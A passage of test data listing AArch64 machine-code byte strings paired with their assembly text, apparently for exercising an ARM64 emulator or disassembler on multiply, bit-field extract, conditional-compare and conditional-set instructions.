("\x20\x8c\xa2\x9b", "umsubl x0, w1, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\x00\x8c\xa2\x9b", "umsubl x0, w0, w2, x3"),
("\xc1\xfd\xbf\xd2", "movz x1, #0xffee, lsl #16"),
("\x42\xd5\xbd\xd2", "movz x2, #0xeeaa, lsl #16"),
("\xa3\xd5\x9b\xd2", "movz x3, #0xdead"),
("\x20\x0c\x22\x9b", "smaddl x0, w1, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\x00\x0c\x22\x9b", "smaddl x0, w0, w2, x3"),
("\xc1\xfd\xbf\xd2", "movz x1, #0xffee, lsl #16"),
("\x42\xd5\xbd\xd2", "movz x2, #0xeeaa, lsl #16"),
("\xa3\xd5\x9b\xd2", "movz x3, #0xdead"),
("\x20\x8c\x22\x9b", "smsubl x0, w1, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\x00\x8c\x22\x9b", "smsubl x0, w0, w2, x3"),
("\xc1\xfd\xbf\xd2", "movz x1, #0xffee, lsl #16"),
("\x42\xd5\xbd\xd2", "movz x2, #0xeeaa, lsl #16"),
("\x20\x7c\x22\x9b", "smull x0, w1, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\x00\x7c\x22\x9b", "smull x0, w0, w2"),
("\xc1\xfd\xbf\xd2", "movz x1, #0xffee, lsl #16"),
("\x42\xd5\xbd\xd2", "movz x2, #0xeeaa, lsl #16"),
("\x20\x7c\x42\x9b", "smulh x0, x1, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x00\x7c\x42\x9b", "smulh x0, x0, x2"),
("\x01\x06\xa0\x92", "movn x1, #0x30, lsl #16"),
("\x02\x02\x80\x92", "movn x2, #16"),
("\x63\xa0\x84\x92", "movn x3, #9475"),
("\x64\xa0\x84\x92", "movn x4, #9475"),
("\xe5\x24\x81\x92", "movn x5, #2343"),
("\xa6\xaf\x81\x92", "movn x6, #3453"),
("\x87\x3a\x82\x92", "movn x7, #4564"),
("\xe8\x16\x84\x92", "movn x8, #8375"),
("\xe9\xc1\x84\x92", "movn x9, #9743"),
("\xea\xaa\x82\x92", "movn x10, #5463"),
("\x2b\xf8\x80\x92", "movn x11, #1985"),
("\xc1\xfd\xff\xd2", "movz x1, #0xffee, lsl #48"),
("\x81\xb9\xdb\xf2", "movk x1, #0xddcc, lsl #32"),
("\x41\x75\xb7\xf2", "movk x1, #0xbbaa, lsl #16"),
("\x01\x31\x93\xf2", "movk x1, #0x9988"),
("\x20\x00\x40\xd3", "ubfx x0, x1, #0, #1"),
("\x20\x08\x40\xd3", "ubfx x0, x1, #0, #3"),
("\x20\x0c\x40\xd3", "ubfx x0, x1, #0, #4"),
("\x20\x10\x40\xd3", "ubfx x0, x1, #0, #5"),
("\x20\x78\x40\xd3", "ubfx x0, x1, #0, #31"),
("\x20\xf8\x40\xd3", "ubfx x0, x1, #0, #63"),
("\x20\xfc\x40\xd3", "ubfx x0, x1, #0, #64"),
("\x20\xfc\x41\xd3", "ubfx x0, x1, #1, #63"),
("\x20\xfc\x42\xd3", "ubfx x0, x1, #2, #62"),
("\x20\xfc\x43\xd3", "ubfx x0, x1, #3, #61"),
("\x20\xfc\x60\xd3", "ubfx x0, x1, #32, #32"),
("\x20\x4c\x4a\xd3", "ubfx x0, x1, #10, #10"),
("\xc1\xfd\xff\xd2", "movz x1, #0xffee, lsl #48"),
("\x81\xb9\xdb\xf2", "movk x1, #0xddcc, lsl #32"),
("\x41\x75\xb7\xf2", "movk x1, #0xbbaa, lsl #16"),
("\x01\x31\x93\xf2", "movk x1, #0x9988"),
("\x20\x00\x40\x93", "sbfx x0, x1, #0, #1"),
("\x20\x08\x40\x93", "sbfx x0, x1, #0, #3"),
("\x20\x0c\x40\x93", "sbfx x0, x1, #0, #4"),
("\x20\x10\x40\x93", "sbfx x0, x1, #0, #5"),
("\x20\x78\x40\x93", "sbfx x0, x1, #0, #31"),
("\x20\xf8\x40\x93", "sbfx x0, x1, #0, #63"),
("\x20\xfc\x40\x93", "sbfx x0, x1, #0, #64"),
("\x20\xfc\x41\x93", "sbfx x0, x1, #1, #63"),
("\x20\xfc\x42\x93", "sbfx x0, x1, #2, #62"),
("\x20\xfc\x43\x93", "sbfx x0, x1, #3, #61"),
("\x20\xfc\x60\x93", "sbfx x0, x1, #32, #32"),
("\x20\x4c\x4a\x93", "sbfx x0, x1, #10, #10"),
("\x20\x48\x49\x93", "sbfx x0, x1, #9, #10"),
("\x20\x40\x47\x93", "sbfx x0, x1, #7, #10"),
("\x20\x3c\x47\x93", "sbfx x0, x1, #7, #9"),
("\xc1\xfd\xbf\xd2", "movz x1, #0xffee, lsl #16"),
("\x42\xd5\xbd\xd2", "movz x2, #0xeeaa, lsl #16"),
("\x20\x00\x42\xfa", "ccmp x1, x2, 0, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x21\x00\x42\xfa", "ccmp x1, x2, 1, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x22\x00\x42\xfa", "ccmp x1, x2, 2, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x23\x00\x42\xfa", "ccmp x1, x2, 3, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x24\x00\x42\xfa", "ccmp x1, x2, 4, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x25\x00\x42\xfa", "ccmp x1, x2, 5, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x26\x00\x42\xfa", "ccmp x1, x2, 6, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x27\x00\x42\xfa", "ccmp x1, x2, 7, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x28\x00\x42\xfa", "ccmp x1, x2, 8, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x29\x00\x42\xfa", "ccmp x1, x2, 9, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x2a\x00\x42\xfa", "ccmp x1, x2, 10, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x2b\x00\x42\xfa", "ccmp x1, x2, 11, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x2c\x00\x42\xfa", "ccmp x1, x2, 12, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x2d\x00\x42\xfa", "ccmp x1, x2, 13, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x2e\x00\x42\xfa", "ccmp x1, x2, 14, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x2f\x00\x42\xfa", "ccmp x1, x2, 15, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\xc1\xfd\xbf\xd2", "movz x1, #0xffee, lsl #16"),
("\xc2\xfd\xbf\xd2", "movz x2, #0xffee, lsl #16"),
("\x20\x00\x42\xfa", "ccmp x1, x2, 0, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x21\x00\x42\xfa", "ccmp x1, x2, 1, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x22\x00\x42\xfa", "ccmp x1, x2, 2, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x23\x00\x42\xfa", "ccmp x1, x2, 3, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x24\x00\x42\xfa", "ccmp x1, x2, 4, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x25\x00\x42\xfa", "ccmp x1, x2, 5, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x26\x00\x42\xfa", "ccmp x1, x2, 6, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
("\xe0\xb7\x9f\x9a", "cset x0, ge"),
("\xe0\xd7\x9f\x9a", "cset x0, gt"),
("\xe0\x97\x9f\x9a", "cset x0, hi"),
("\xe0\x37\x9f\x9a", "cset x0, hs"),
("\xe0\xc7\x9f\x9a", "cset x0, le"),
("\xe0\x27\x9f\x9a", "cset x0, lo"),
("\xe0\x87\x9f\x9a", "cset x0, ls"),
("\xe0\xa7\x9f\x9a", "cset x0, lt"),
("\xe0\x57\x9f\x9a", "cset x0, mi"),
("\xe0\x07\x9f\x9a", "cset x0, ne"),
("\xe0\x47\x9f\x9a", "cset x0, pl"),
("\xe0\x67\x9f\x9a", "cset x0, vc"),
("\xe0\x77\x9f\x9a", "cset x0, vs"),
("\x27\x00\x42\xfa", "ccmp x1, x2, 7, eq"),
("\xe0\x17\x9f\x9a", "cset x0, eq"),
